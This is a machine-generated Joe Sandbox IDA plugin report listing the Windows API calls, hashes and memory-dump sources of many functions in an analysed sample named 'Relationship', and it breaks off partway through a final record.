                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                            • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                            • Instruction ID: bdbfa788b1600daf940c527e2f22301b3cd13ccace3618520468ab08620b7a34
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F81FB72600B259BD720EE69EC81B6EB3A9AF44320F34812BF521D7A93E770DE409754
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C18649,00C18649,?,?,?,00C267C2,00000001,00000001,8BE85006), ref: 00C265CB
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C267C2,00000001,00000001,8BE85006,?,?,?), ref: 00C26651
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C2674B
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C26758
                                                                                                                                                                                                                                                                              • Part of subcall function 00C23B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C16A79,?,0000015D,?,?,?,?,00C185B0,000000FF,00000000,?,?), ref: 00C23BC5
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C26761
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C26786
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2850d91c33c7272e789a8d97a4e1eefda2a9b8fc2760d1729496b62a38a30996
                                                                                                                                                                                                                                                                            • Instruction ID: f6330a4318be0416631b68815478ab04ff14a15c136bce36748b5da618781b26
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2850d91c33c7272e789a8d97a4e1eefda2a9b8fc2760d1729496b62a38a30996
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A451FF72610226AFEB258E64EC85EAF77AAEF40B14F140268FC25D6580EB34DD5096B0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7C10E,?,?), ref: 00C7D415
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D451
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4C8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4FE
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C72A
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7C785
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7C7CA
                                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C7C7F9
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C7C853
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C7C85F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4751d420b0fcc8cb13259e2fe8f34597ff6cdfbb8513905b3f55650a1f2c0ecc
                                                                                                                                                                                                                                                                            • Instruction ID: 22aee9a0ae68facb52988a112dac6e68f1ee68794c1048ef4307612ac30c665b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4751d420b0fcc8cb13259e2fe8f34597ff6cdfbb8513905b3f55650a1f2c0ecc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33819075108246AFC714DF24C8C5E2ABBE5FF84308F14859CF55A4B2A2DB31EE49CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 00C500A9
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C50150
                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00C50354,00000000), ref: 00C50179
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00C50354), ref: 00C5019D
                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00C50354,00000000), ref: 00C501A1
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C501AB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                            • Opcode ID: 607f986909bc4b74850f8a756b488c30ffc50547639899cca67788ed0ce35768
                                                                                                                                                                                                                                                                            • Instruction ID: 7c420241521da85a95dc71ad48955675fc91a074151029a5ab2f69070e4c41e8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 607f986909bc4b74850f8a756b488c30ffc50547639899cca67788ed0ce35768
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA51C539600314AACF20AB659C89B2DB3A5EF45312F349446ED06DF2D6DB709CC8DB5A
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00C69F2A
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C69F4B
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C69F72
                                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00C69FCA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                            • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                            • Opcode ID: 7b964a714f1753726ed5158187b61337904f2153c10a9780f33be6b82271aeec
                                                                                                                                                                                                                                                                            • Instruction ID: a0031a63d50c1e3e621d3155d76ac02d05c30590d628b2064c7658a4705b821a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b964a714f1753726ed5158187b61337904f2153c10a9780f33be6b82271aeec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15E1A2315043049FC724EF24C881B6AB7E4FF85314F1489ADF99A9B2A2DB71DD49CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C66F21
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C6707E
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00C90CC4,00000000,00000001,00C90B34,?), ref: 00C67095
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C67319
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                            • Opcode ID: a4dd009d655da1b330060d0d1245049f8efb468cd17d5416ecb3d93bd147cd24
                                                                                                                                                                                                                                                                            • Instruction ID: 8b2736291311926275d7e05f9a83f078da9303068860260a3021673dbec32f68
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4dd009d655da1b330060d0d1245049f8efb468cd17d5416ecb3d93bd147cd24
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82D14A71508205AFC314EF64C881E6BB7E8FF98708F40496DF5968B262DB71ED49CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00BF1B35
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00BF1B99
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00BF1BB6
                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BF1BC7
                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00BF1C15
                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C33287
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1C2D: BeginPath.GDI32(00000000), ref: 00BF1C4B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                            • Opcode ID: f4bfa8c2c30340471440f244be045e8a1990c67a80ea7e722309298234b18359
                                                                                                                                                                                                                                                                            • Instruction ID: cb14caeb045299dadb73295833dc3ef3e86c5213591788da8da5f8cf9c967a1b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4bfa8c2c30340471440f244be045e8a1990c67a80ea7e722309298234b18359
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA418070204344EFD710EF28DC85FBA7BE8EB45334F140AA9FA658B1A2D7719948DB61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C611B3
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C611EE
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00C6120A
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00C61283
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C6129A
                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C612C8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                            • Opcode ID: 45209674b6c1fc60442e0b8f9fe100487c6dcda1db973954fa945bc23ded8ac3
                                                                                                                                                                                                                                                                            • Instruction ID: deaacf5fee04703127071e27fd576a7fe35ab2be6d079afe97bf4325eff141cf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45209674b6c1fc60442e0b8f9fe100487c6dcda1db973954fa945bc23ded8ac3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88414A71900205ABDF149F54DCC5BAEB7B8FF05311F2840A5EE009A296DB74DEA1EBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C4FBEF,00000000,?,?,00000000,?,00C339E2,00000004,00000000,00000000), ref: 00C88CA7
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00C88CCD
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C88D2C
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00C88D40
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00C88D66
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C88D8A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                                                                                                                            • Opcode ID: dece3494d01932e30da615a42e3f537b873804966ea454eda8b8ffeb07d62003
                                                                                                                                                                                                                                                                            • Instruction ID: 4f9f1871905894e99f8240f7a7116f8b1e139f724c6fd78685a71630b7333c78
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dece3494d01932e30da615a42e3f537b873804966ea454eda8b8ffeb07d62003
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32412930601245AFDB25EF24C889FA57BF0FF45309F5800A9E5194B6B6CB71AD4ACB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00C72D45
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6EF33: GetWindowRect.USER32(?,?), ref: 00C6EF4B
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C72D6F
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C72D76
                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C72DB2
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C72DDE
                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C72E3C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                            • Opcode ID: e09af1b056228ecb053c4abc990b10c3e01b241166cad3b8584d09bc31336db4
                                                                                                                                                                                                                                                                            • Instruction ID: 24ea46e3b88150bd5e31aa2421ec65651029732866d4921c54cc6fbde8168f01
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e09af1b056228ecb053c4abc990b10c3e01b241166cad3b8584d09bc31336db4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4231DC72505315AFC720DF54C849F9BB7A9FF94314F00492EF899A7181DA30EA89CBD6
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00C555F9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C55616
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C5564E
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5566C
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C55674
                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C5567E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 72514467-0
                                                                                                                                                                                                                                                                            • Opcode ID: e36eb430dd33ec40f173b647a3cfdd8e5fe18999e8f55dfe279f301f59813aa4
                                                                                                                                                                                                                                                                            • Instruction ID: d341be239acb9e13948f053f5ebfc6cf76a4ef1edf430b6f14c49ab5d6cae6ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e36eb430dd33ec40f173b647a3cfdd8e5fe18999e8f55dfe279f301f59813aa4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78214676204640BBEB155B25DC19FBF7BA8EF45721F104029FC06CA291EFA0CDC0A7A4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF55D1,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BF5871
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C662C0
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C663DA
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00C90CC4,00000000,00000001,00C90B34,?), ref: 00C663F3
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C66411
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                            • String ID: .lnk
